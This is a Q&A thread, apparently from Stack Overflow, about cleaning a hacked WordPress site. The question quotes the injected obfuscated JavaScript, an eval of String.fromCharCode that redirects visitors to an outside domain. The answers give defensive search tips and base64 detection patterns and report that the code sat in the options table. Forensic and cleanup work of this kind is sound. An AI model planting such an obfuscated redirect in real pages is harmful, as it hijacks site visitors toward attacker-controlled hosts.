# How to remove malicious eval script that cannot be found in header.php

Tags: php, wordpress, eval

My WordPress website has been hacked and I'm only able to view the malicious script by viewing the source of my index page: 'view-source:mydomain.com'

The problem is, I can't find the location of this code in any of my WordPress php files. I've gone through all the core files (header.php, htaccess, etc.) without being able to find it.

The code sits right before closing /head tag:

```
<script language=javascript>eval(String.fromCharCode(32, 32, 118, 97, 114, 32, 32, 32, 116, 100, 32, 61, 32, 49, 59, 32, 118, 97, 114, 32, 122, 122, 103, 32, 61, 32, 50, 59, 32, 118, 97, 114, 32, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 108, 101, 102, 116, 111, 117, 116, 115, 105, 100, 101, 109, 121, 112, 114, 111, 102, 105, 108, 101, 46, 105, 110, 102, 111, 47, 117, 112, 116, 121, 112, 101, 63, 122, 103, 61, 49, 38, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 99, 41, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 99, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 99, 59));</script>
```

I know that this is a malicious redirect, but don't know how to deal with it. I originally fixed the issue by completely reinstalling my website (losing some posts as a result), and did my best as a noob to resolve this problem before asking this question.

Would really appreciate some help!

EDIT: Found the following, insure if relevant:

`

class WPSEO_Frontend {

```
function __construct() {

    wp_reset_query();

    $options = get_wpseo_options();

    add_action('wp_head', array(&$this, 'head'), 1, 1);
    remove_action('wp_head', 'rel_canonical');

    add_filter( 'wp_title', array(&$this, 'title'), 10, 3);
    add_filter( 'thematic_doctitle', array(&$this, 'force_wp_title') );
    add_filter( 'headway_title', array(&$this, 'force_wp_title') );

    add_action('wp',array(&$this,'page_redirect'),99,1);`
```

Answer (score 0):

Chances are high that also the output of the `<script>` block is encoded in your source php files, so you won't be able to find the code snippet from above but rather something like a base64 encoded string in some of your wordpress files. Like Alexandru suggested you could search in all your WP-Files contents for `base64_decode` and carfully check the occurences. However, since there are theoretically endless possibilities how to mask a string, this can become cumbersome quite easily.

Another approach could be to search for the `wp_head` hook (-> search for `'add_action('wp_head'` that is typically used to inject code to your website's `header` section. Maybe you find the function that is called and responsible for injecting the output above. In case you spot any odd looking code, post it here.

Comment: Thanks for your reply. Which files should I be checking for that? Core files in the WordPress theme folder?

Comment: Basically your entire wordpress setup "as is" on your ftp server, including all custom plugins and themes. Depending on how the attacker got access to your site the malicious code can potentially be stored anywhere.

Comment: Added a comment with some code, and not sure if this is relevant: add_action('wp_head', array(&$this, 'head'), 1, 1);

Answer (score 0):

The code was inserted into WordPress' options table (sgcgoogleanalytic). I successfully removed the script from the table.

Answer (score 0):

I had the same issue! After some digging around I was able to find the culprit by searching for the base64 encoded version of the `String.fromCharCode` snippet from a db export. When searching for base64 strings you need to take into account that the offset can be different from the 1-to-1 base64 decoding of `String.fromCharCode`, which is `U3RyaW5nLmZyb21DaGFyQ29k`.

So in short, I searched for these patterns:

- `U3RyaW5nLmZyb21DaGFyQ29k` (no offset)
  [image: no offset]
- `N0cmluZy5mcm9tQ2hhckNvZG` (for a centered offset) [image: centered offset]
- `TdHJpbmcuZnJvbUNoYXJDb2Rl` (for an offset of 2) [image: left padded]

Bit late for the party here, but hope to help some future readers!